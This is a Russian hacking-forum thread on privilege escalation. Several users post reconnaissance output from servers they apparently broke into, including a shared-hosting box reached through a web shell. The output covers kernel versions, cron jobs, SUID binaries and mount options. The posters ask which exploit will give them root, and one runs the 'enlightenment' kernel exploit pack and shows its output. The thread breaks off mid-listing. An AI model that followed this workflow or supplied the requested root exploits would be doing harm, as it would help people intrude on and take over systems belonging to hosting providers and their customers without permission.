Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. EstGi

    EstGi New Member

    Joined:
    9 Sep 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Linux 2.6.26-2-amd64 #1 SMP Sun Mar 4 21:48:06 UTC 2012 x86_64 GNU/Linux
    ================================================ ls -la /boot ================================================
    total 9652
    drwxr-xr-x 3 root root 4096 Jun 13 2013 .
    drwxr-xr-x 23 root root 4096 Sep 14 06:39 ..
    -rw-r--r-- 1 root root 1227656 Mar 4 2012 System.map-2.6.26-2-amd64
    -rw-r--r-- 1 root root 85694 Mar 4 2012 config-2.6.26-2-amd64
    drwxr-xr-x 2 root root 4096 Jun 13 2013 grub
    -rw-r--r-- 1 root root 6771715 Jun 13 2013 initrd.img-2.6.26-2-amd64
    -rw-r--r-- 1 root root 1757072 Mar 4 2012 vmlinuz-2.6.26-2-amd64
    ================================================ cat /proc/version ================================================
    Linux version 2.6.26-2-amd64 (Debian 2.6.26-29) (dannf@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Mar 4 21:48:06 UTC 2012
    ================================================ cat /etc/issue ================================================
    Debian GNU/Linux 5.0
    ============================================================================================================
    $sudo -V
    Sudo version 1.6.9p17
    ============================================================================================================
    $ ldd --version
    ldd (GNU libc) 2.7
    ============================================================================================================
    cat /proc/sys/kernel/randomize_va_space
    2
    ============================================================================================================

    Подскажите пожалуйста чем порутать, все вроде старое но не пробивает ((
    вот от этого https://www.exploit-db.com/exploits/34134/ сервер уходит в ребут
     
  2. PlataOPlomo

    PlataOPlomo New Member

    Joined:
    1 Sep 2016
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер!

    Буду признателен за подсказку.

    Code:
    sh-4.1$ uname -a
    uname -a
    Linux h1.ihc.ru 2.6.32-642.1.1.el6.x86_64 #1 SMP Tue May 31 21:57:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
    
    
    sh-4.1$ ls -la /boot
    ls -la /boot
    total 82360
    dr-xr-xr-x  4 root root     4096 Jun 20 15:46 .
    drwxr-xr-x 26 root root     4096 Jul  5 00:30 ..
    -rw-r--r--  1 root root      170 Mar  7  2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      170 Jun  1 01:02 .vmlinuz-2.6.32-642.1.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      165 May 20  2011 .vmlinuz-2.6.32-71.el6.x86_64.hmac
    -rw-r--r--  1 root root  2313972 Mar  7  2012 System.map-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root  2615135 Jun  1 01:02 System.map-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root  2226490 May 20  2011 System.map-2.6.32-71.el6.x86_64
    -rw-r--r--  1 root root   100947 Mar  7  2012 config-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root   108107 Jun  1 01:02 config-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root    97862 May 20  2011 config-2.6.32-71.el6.x86_64
    drwxr-xr-x  3 root root     4096 Dec  8  2011 efi
    drwxr-xr-x  2 root root     4096 Jun 21 11:14 grub
    -rw-r--r--  1 root root 15414292 Apr 17  2012 initramfs-2.6.32-220.7.1.el6.x86_64.img
    -rw-------  1 root root 22114675 Jun 20 15:42 initramfs-2.6.32-642.1.1.el6.x86_64.img
    -rw-r--r--  1 root root 13446144 Dec  8  2011 initramfs-2.6.32-71.el6.x86_64.img
    -rw-------  1 root root  4768542 Jun 20 15:41 initrd-2.6.32-220.7.1.el6.x86_64kdump.img
    -rw-------  1 root root  4876579 Jun 20 15:46 initrd-2.6.32-642.1.1.el6.x86_64kdump.img
    -rw-r--r--  1 root root  3643212 Apr 17  2012 initrd-2.6.32-71.el6.x86_64kdump.img
    -rw-r--r--  1 root root   171216 Mar  7  2012 symvers-2.6.32-220.7.1.el6.x86_64.gz
    -rw-r--r--  1 root root   215559 Jun  1 01:02 symvers-2.6.32-642.1.1.el6.x86_64.gz
    -rw-r--r--  1 root root   160542 May 20  2011 symvers-2.6.32-71.el6.x86_64.gz
    -rwxr-xr-x  1 root root  3941040 Mar  7  2012 vmlinuz-2.6.32-220.7.1.el6.x86_64
    -rwxr-xr-x  1 root root  4264432 Jun  1 01:02 vmlinuz-2.6.32-642.1.1.el6.x86_64
    -rwxr-xr-x  1 root root  3791040 May 20  2011 vmlinuz-2.6.32-71.el6.x86_64
    
    
    sh-4.1$ ls -la --full-time /lib
    ls -la --full-time /lib
    total 48
    dr-xr-xr-x 10 root root  4096 2016-08-02 16:19:19.410880280 +0300 .
    drwxr-xr-x 26 root root  4096 2016-07-05 00:30:41.385863698 +0300 ..
    drwxr-xr-x  3 root root  4096 2016-05-11 11:24:26.000000000 +0300 alsa
    lrwxrwxrwx  1 root root    14 2016-08-02 16:19:19.410880280 +0300 cpp -> ../usr/bin/cpp
    drwxr-xr-x  3 root root  4096 2016-06-20 14:40:03.502496274 +0300 crda
    drwxr-xr-x 46 root root 12288 2016-06-20 15:41:30.129591585 +0300 firmware
    drwxr-xr-x  6 root root  4096 2011-12-08 18:08:22.000000000 +0400 kbd
    dr-xr-xr-x  5 root root  4096 2016-06-20 14:40:09.462474436 +0300 modules
    drwxr-xr-x  2 root root  4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x  6 root root  4096 2015-03-16 11:53:51.000000000 +0300 terminfo
    drwxr-xr-x  5 root root  4096 2016-08-18 04:07:48.429461162 +0300 udev
    
    
    sh-4.1$ mount
    mount
    /dev/sda1 on / type ext4 (rw,noatime)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime,data=writeback,barrier=0)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /dev/sda4 on /home type ext4 (rw,noatime,usrquota,barrier=0)
    
    
    sh-4.1$ df -h
    df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1        30G  6.8G   22G  25% /
    tmpfs            24G   80K   24G   1% /dev/shm
    /dev/sda3       2.0G  779M  1.1G  43% /tmp
    /dev/sda4       1.8T  434G  1.4T  25% /home
    
    
    sh-4.1$ cat /etc/issue
    cat /etc/issue
    CentOS release 6.8 (Final)
    Kernel \r on an \m
    
    
    sh-4.1$ cat /etc/crontab
    cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=cronlog
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    
    */5 * * * * root /usr/local/bin/passwd_change.sh >/dev/null 2>&1
    0 */3 * * * root /usr/local/bin/bbutemp.sh  >/dev/null 2>&1
    */10 * * * * root /usr/local/bin/move_nrpe.sh >/dev/null 2>&1
    */10 * * * * root /usr/bin/timeout 540 puppet agent --no-daemonize --onetime -l /var/log/puppet/agent.log --onetime --certname `hostname` --server puppet.ihc-ru.net >/dev/null 2>&1; rm -f /var/lib/puppet/state/agent_catalog_run.lock
    */30 * * * * root ( fail2ban-client reload WordPress; /sbin/iptables -F http ) >/dev/null 2>&1
    0 2 * * * root ( sqlite3 /var/lib/fail2ban/fail2ban.sqlite3 "DELETE FROM bans; VACUUM;"; /sbin/service fail2ban restart ) >/dev/null 2>&1
    */30 * * * * root /usr/local/bin/shape_shared.sh >/dev/null 2>&1
    0 2 * * 7 root [ `date "+\%d"` -lt 8 ] && root /usr/local/bin/autolearn.sh >/dev/null 2>&1
    30 22 * * * root /usr/local/bin/countfiles.sh >/dev/null 2>&1
    */3 * * * * root /usr/bin/killall -19 transmission-daemon deluge deluged mlnet rtorrent utserver deluge-web fmb qbittorrent minerd jhprimeminer bitcoind > /dev/null 2>&1
    40 17 * * * root /usr/local/bin/regkernelcare >/dev/null 2>&1
    0 3 * * 1 root /usr/local/bin/virusscan.pl >/dev/null 2>&1
    
    
    
    sh-4.1$ ls -la /etc/cron.d
    ls -la /etc/cron.d
    total 44
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rw-r--r--   1 root root    67 Apr 28  2010 atop
    -rw-r--r--   1 root root    50 Jun 20 16:15 kcare-cron
    -rw-r--r--   1 root root   405 Jun 20 16:17 lsws
    -rw-r--r--   1 root root   232 Jun 20 16:19 puppet
    -rw-------   1 root root   108 Dec 11  2015 raid-check
    -rw-r--r--   1 root root   459 Dec  5  2013 sa-update
    -rw-------   1 root root   235 May 11 05:02 sysstat
    
    
    sh-4.1$ ls -la /etc/cron.hourly
    ls -la /etc/cron.hourly
    total 28
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rwxr-xr-x   1 root root   195 Mar 20  2013 00awstats
    -rwx------   1 root root   611 Jun 20 16:17 ip6_check_count_rules.sh
    -rwx------   1 root root   899 Jun 20 16:16 rotate_acct.sh
    
    
    sh-4.1$ ls -la /etc/cron.monthly
    ls -la /etc/cron.monthly
    total 20
    drwxr-xr-x   2 root root  4096 Jun 20 15:41 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:49 ..
    -rwxr-xr-x   1 root root   111 Nov 23  2013 readahead-monthly.cron
    
    
    sh-4.1$ ls -la /etc/cron.weekly
    ls -la /etc/cron.weekly
    total 16
    drwxr-xr-x   2 root root  4096 Apr 17  2012 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:50 ..
    
    
    sh-4.1$ cat /proc/version
    cat /proc/version
    Linux version 2.6.32-642.1.1.el6.x86_64 (mockbuild@worker1.bsys.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Tue May 31 21:57:07 UTC 2016
    
    
    sh-4.1$ cat /proc/sys/vm/mmap_min_addr
    cat /proc/sys/vm/mmap_min_addr
    4096
    
    
    sh-4.1$ pwd
    pwd
    /home/p2267/www/****.ru/content
    
    
    sh-4.1$ ls -la /usr/bin/staprun
    ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    
    
    sh-4.1$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-x--- 1 root dbus 50552 Apr 22  2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 53472 May 11 01:58 /bin/umount
    -rwsr-xr-x 1 root root 77336 May 11 01:58 /bin/mount
    -rwsr-xr-x 1 root root 34904 May 11 11:59 /bin/su
    -rwsr-xr-x 1 root root 36488 May 10 21:32 /bin/ping6
    -rwsr-xr-x 1 root root 38264 May 10 21:32 /bin/ping
    -r-sr-xr-x 1 root root 19848 Jun 30  2015 /usr/local/lsws/bin/lscgid.5.0.1
    -r-sr-xr-x 1 root root 19848 May 26 16:56 /usr/local/lsws/bin/lscgid.5.0.17
    -r-sr-xr-x 1 root root 23736 Aug  4  2014 /usr/local/lsws/bin/lscgid.4.2.13
    -r-sr-xr-x 1 root root 19848 Nov 19  2015 /usr/local/lsws/bin/lscgid.5.0.8
    -r-sr-xr-x 1 root root 19848 Jul 22  2015 /usr/local/lsws/bin/lscgid.5.0.2
    -r-sr-xr-x 1 root root 21984 Jan 12  2012 /usr/local/lsws/bin/lscgid.4.1.10
    -r-sr-xr-x 1 root root 23736 Jun 10  2014 /usr/local/lsws/bin/lscgid.4.2.12
    -r-sr-xr-x 1 root root 19848 Apr 18 09:35 /usr/local/lsws/bin/lscgid.5.1.4
    -r-sr-xr-x 1 root root 19848 Apr 18 10:51 /usr/local/lsws/bin/lscgid.5.0.15
    -r-sr-xr-x 1 root root 19848 Jul 20 09:55 /usr/local/lsws/bin/lscgid.5.1.7
    -r-sr-xr-x 1 root root 23736 Jan 14  2015 /usr/local/lsws/bin/lscgid.4.2.20
    -r-sr-xr-x 1 root root 19848 Aug 31  2015 /usr/local/lsws/bin/lscgid.5.0.5
    -r-sr-xr-x 1 root root 23736 Feb  4  2015 /usr/local/lsws/bin/lscgid.4.2.21
    -r-sr-xr-x 1 root root 19848 Mar 14  2016 /usr/local/lsws/bin/lscgid.5.0.14
    -r-sr-xr-x 1 root root 23736 Nov 18  2013 /usr/local/lsws/bin/lscgid.4.2.5
    -r-sr-xr-x 1 root root 23736 Oct  9  2014 /usr/local/lsws/bin/lscgid.4.2.17
    -r-sr-xr-x 1 root root 23736 Oct  2  2014 /usr/local/lsws/bin/lscgid.4.2.16
    -r-sr-xr-x 1 root root 23736 Nov 25  2014 /usr/local/lsws/bin/lscgid.4.2.19
    -r-sr-xr-x 1 root root 19848 Oct 13  2015 /usr/local/lsws/bin/lscgid.5.0.7
    -r-sr-xr-x 1 root root 23736 Oct 31  2014 /usr/local/lsws/bin/lscgid.4.2.18
    -r-sr-xr-x 1 root root 23736 Aug 14  2014 /usr/local/lsws/bin/lscgid.4.2.14
    -r-sr-xr-x 1 root root 23736 Apr  8  2014 /usr/local/lsws/bin/lscgid.4.2.6
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.9
    -r-sr-xr-x 1 root root 23736 May 22  2014 /usr/local/lsws/bin/lscgid.4.2.11
    -r-sr-xr-x 1 root root 19848 Aug 17  2015 /usr/local/lsws/bin/lscgid.5.0.4
    -r-sr-xr-x 1 root root 19848 Jul 13 09:42 /usr/local/lsws/bin/lscgid.5.1.6
    -r-sr-xr-x 1 root root 23736 Apr  1  2014 /usr/local/lsws/bin/lscgid.4.2.7
    -r-sr-xr-x 1 root root 23736 Jun  1  2015 /usr/local/lsws/bin/lscgid.4.2.23
    -r-sr-xr-x 1 root root 19848 Dec  6  2015 /usr/local/lsws/bin/lscgid.5.0.9
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.8
    -r-sr-xr-x 1 root root 19848 May 25 12:28 /usr/local/lsws/bin/lscgid.5.1.5
    -r-sr-xr-x 1 root root 23736 Sep 29  2013 /usr/local/lsws/bin/lscgid.4.2.4
    -r-sr-xr-x 1 root root 19848 Jun 24  2015 /usr/local/lsws/bin/lscgid.5.0
    -rws--x--x 1 root root 14280 May 10 17:11 /usr/libexec/pt_chown
    -rws--x--x 1 vcsa root 11208 May 11 00:24 /usr/libexec/mc/cons.saver
    -rwsr-xr-x 1 root root 257824 May 12 07:52 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Mar 17  2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rws--x--x 1 root root 20184 May 11 01:58 /usr/bin/chfn
    -rws--x--x 1 root root 20056 May 11 01:58 /usr/bin/chsh
    -rwsr-xr-x 1 root root 40240 May 11 00:23 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 30768 Nov 23  2015 /usr/bin/passwd
    -rwsr-xr-x 1 root root 75640 May 11 00:23 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 70480 May 11 00:23 /usr/bin/chage
    -rwsr-xr-x 1 root root 22544 Mar 17  2015 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 54496 Feb 19  2015 /usr/bin/at
    ---s--x--x 1 root root 123832 May 11 02:13 /usr/bin/sudo
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    -rwsr-xr-x 1 root root 21302 May  5  2014 /usr/share/doc/fping-3.10/ChangeLog
    -rwsr-xr-x 1 root root 1067 May  5  2014 /usr/share/doc/fping-3.10/COPYING
    -rwsr-xr-x 1 root root 1496 May  5  2014 /usr/share/doc/fping-3.10/README
    -rwsr-xr-x 1 root root 92815 May  7  2014 /usr/sbin/fping6
    -rwsr-xr-x 1 root root 9000 May 11 22:34 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 1274440 Mar  4  2016 /usr/sbin/exim
    -rws--x--x 1 root root 42288 Aug 22  2010 /usr/sbin/userhelper
    -rwsr-xr-x 1 root root 42792 May  7  2014 /usr/sbin/fping
    -rwsr-xr-x 1 root root 34840 May 11 02:18 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 10272 May 11 02:18 /sbin/pam_timestamp_check
    -rwsrwsrwt 1 p2267 p2267 72844 Sep 18 19:16 /home/p2267/www/****.ru/content/pagesinfo.php
    


    Пробовал enlightenment, результат следующий:
    Code:
    sh-4.1$ tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
    <ent.tgz && cd enlightenment && ./run_null_exploits.sh                      
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...failed.
    Compiling exp_wunderbar.c...OK.
    Pulseaudio does not exist!
    [+] Personality set to: PER_SVR4
    sh-4.1$
    

    Спасибо!
     
  3. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    84
    Likes Received:
    10
    Reputations:
    0
    Здравствуйте!! Помогите найти сплоит...
    Code:
    Linux ***** 2.6.32-37-pve #1 SMP Wed Feb 11 10:00:27 CET 2015 i686 GNU/Linux
    Code:
    $ ls -la /boot 2>&1
    total 8
    drwxr-xr-x  2 root root 4096 Nov 11  2010 .
    drwxr-xr-x 24 root root 4096 Nov  9 01:09 ..
    Code:
    $ ls -la --full-time /lib 2>&1
    total 5164
    drwxr-xr-x 10 root root    4096 2013-04-29 14:57:53.000000000 +0400 .
    drwxr-xr-x 24 root root    4096 2016-11-09 01:09:27.096608013 +0400 ..
    lrwxrwxrwx  1 root root      21 2013-04-29 14:57:53.000000000 +0400 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:23.000000000 +0300 i486-linux-gnu
    drwxr-xr-x  3 root root    4096 2010-11-11 17:57:21.000000000 +0300 init
    -rwxr-xr-x  1 root root  113248 2011-01-08 09:59:32.000000000 +0300 ld-2.7.so
    lrwxrwxrwx  1 root root       9 2013-04-29 14:39:24.000000000 +0400 ld-linux.so.2 -> ld-2.7.so
    -rw-r--r--  1 root root    5436 2011-01-08 09:59:33.000000000 +0300 libBrokenLocale-2.7.so
    lrwxrwxrwx  1 root root      22 2013-04-29 14:39:24.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libSegFault.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rw-r--r--  1 root root   24800 2008-04-24 01:22:04.000000000 +0400 libacl.so.1.1.0
    -rw-r--r--  1 root root    9800 2011-01-08 09:59:32.000000000 +0300 libanl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libanl.so.1 -> libanl-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rw-r--r--  1 root root   14744 2009-02-10 13:52:07.000000000 +0300 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rw-r--r--  1 root root   38020 2008-10-13 07:33:35.000000000 +0400 libblkid.so.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1.0 -> libbz2.so.1.0.4
    -rw-r--r--  1 root root   66276 2010-08-18 21:15:26.000000000 +0400 libbz2.so.1.0.4
    -rwxr-xr-x  1 root root 1294572 2011-01-08 09:59:32.000000000 +0300 libc-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libc.so.6 -> libc-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rw-r--r--  1 root root   11024 2004-04-14 02:10:45.000000000 +0400 libcap.so.1.10
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.2 -> libcap.so.2.11
    -rw-r--r--  1 root root   13364 2008-07-26 19:26:50.000000000 +0400 libcap.so.2.11
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcfont.so.0 -> libcfont.so.0.0.0
    -rw-r--r--  1 root root   10712 2008-04-16 01:18:10.000000000 +0400 libcfont.so.0.0.0
    -rw-r--r--  1 root root  185816 2011-01-08 09:59:32.000000000 +0300 libcidn-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libcidn.so.1 -> libcidn-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rw-r--r--  1 root root    8676 2008-10-13 07:33:34.000000000 +0400 libcom_err.so.2.1
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libconsole.so.0 -> libconsole.so.0.0.0
    -rw-r--r--  1 root root   72816 2008-04-16 01:18:10.000000000 +0400 libconsole.so.0.0.0
    -rw-r--r--  1 root root   38296 2011-01-08 09:59:32.000000000 +0300 libcrypt-2.7.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:39:24.000000000 +0400 libcrypt.so.1 -> libcrypt-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libctutils.so.0 -> libctutils.so.0.0.0
    -rw-r--r--  1 root root   17024 2008-04-16 01:18:10.000000000 +0400 libctutils.so.0.0.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root   55052 2006-02-15 01:06:32.000000000 +0300 libdb1-2.2.5.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb1.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root    9680 2011-01-08 09:59:32.000000000 +0300 libdl-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 libdl.so.2 -> libdl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rw-r--r--  1 root root   22912 2008-10-13 07:33:35.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rw-r--r--  1 root root  167900 2008-10-13 07:33:35.000000000 +0400 libext2fs.so.2.4
    -rw-r--r--  1 root root   49676 2008-12-31 15:50:19.000000000 +0300 libgcc_s.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libhistory.so.5 -> libhistory.so.5.2
    -rw-r--r--  1 root root   28032 2009-01-20 18:07:11.000000000 +0300 libhistory.so.5.2
    -rw-r--r--  1 root root    5744 2008-09-01 15:01:21.000000000 +0400 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rw-r--r--  1 root root  149328 2011-01-08 09:59:32.000000000 +0300 libm-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libm.so.6 -> libm-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libmemusage.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7
    -rw-r--r--  1 root root  202188 2008-12-14 23:27:28.000000000 +0300 libncurses.so.5.7
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7
    -rw-r--r--  1 root root  249836 2008-12-14 23:27:29.000000000 +0300 libncursesw.so.5.7
    -rw-r--r--  1 root root   79608 2011-01-08 09:59:32.000000000 +0300 libnsl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libnsl.so.1 -> libnsl-2.7.so
    -rw-r--r--  1 root root   30436 2011-01-08 09:59:32.000000000 +0300 libnss_compat-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.7.so
    -rw-r--r--  1 root root   17880 2011-01-08 09:59:33.000000000 +0300 libnss_dns-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.7.so
    -rw-r--r--  1 root root   38408 2011-01-08 09:59:32.000000000 +0300 libnss_files-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libnss_files.so.2 -> libnss_files-2.7.so
    -rw-r--r--  1 root root   17896 2011-01-08 09:59:32.000000000 +0300 libnss_hesiod-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
    -rw-r--r--  1 root root   76292 2008-11-04 18:09:17.000000000 +0300 libnss_ldap-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libnss_ldap.so.2 -> libnss_ldap-2.7.so
    -rw-r--r--  1 root root   34348 2011-01-08 09:59:33.000000000 +0300 libnss_nis-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.7.so
    -rw-r--r--  1 root root   46600 2011-01-08 09:59:32.000000000 +0300 libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      21 2013-04-29 14:39:24.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpam.so.0 -> libpam.so.0.81.12
    -rw-r--r--  1 root root   40440 2009-03-18 03:03:06.000000000 +0300 libpam.so.0.81.12
    lrwxrwxrwx  1 root root      21 2013-04-29 14:38:23.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.3
    -rw-r--r--  1 root root    8256 2009-03-18 03:03:06.000000000 +0300 libpam_misc.so.0.81.3
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
    -rw-r--r--  1 root root    9144 2009-03-18 03:03:06.000000000 +0300 libpamc.so.0.81.0
    -rw-r--r--  1 root root    5440 2011-01-08 09:59:32.000000000 +0300 libpcprofile.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
    -rw-r--r--  1 root root   33284 2008-06-25 10:27:20.000000000 +0400 libpopt.so.0.0.0
    -rw-r--r--  1 root root   56180 2009-01-12 00:49:28.000000000 +0300 libproc-3.2.7.so
    -rwxr-xr-x  1 root root  112012 2011-01-08 09:59:36.000000000 +0300 libpthread-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libpthread.so.0 -> libpthread-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libreadline.so.5 -> libreadline.so.5.2
    -rw-r--r--  1 root root  200548 2009-01-20 18:07:11.000000000 +0300 libreadline.so.5.2
    -rw-r--r--  1 root root   63312 2011-01-08 09:59:32.000000000 +0300 libresolv-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:39:24.000000000 +0400 libresolv.so.2 -> libresolv-2.7.so
    -rw-r--r--  1 root root   30624 2011-01-08 09:59:32.000000000 +0300 librt-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 librt.so.1 -> librt-2.7.so
    -rw-r--r--  1 root root   95964 2008-09-16 11:38:17.000000000 +0400 libselinux.so.1
    -rw-r--r--  1 root root  215260 2008-07-12 18:51:50.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libslang.so.2 -> libslang.so.2.1.3
    -rw-r--r--  1 root root  683040 2008-03-17 21:50:56.000000000 +0300 libslang.so.2.1.3
    lrwxrwxrwx  1 root root      12 2013-04-29 14:38:23.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rw-r--r--  1 root root   18636 2008-10-13 07:33:34.000000000 +0400 libss.so.2.0
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libsysfs.so.2 -> libsysfs.so.2.0.1
    -rw-r--r--  1 root root   38584 2008-09-06 12:40:51.000000000 +0400 libsysfs.so.2.0.1
    -rw-r--r--  1 root root   26284 2011-01-08 09:59:32.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libtic.so.5 -> libtic.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:28.000000000 +0300 libtic.so.5.7
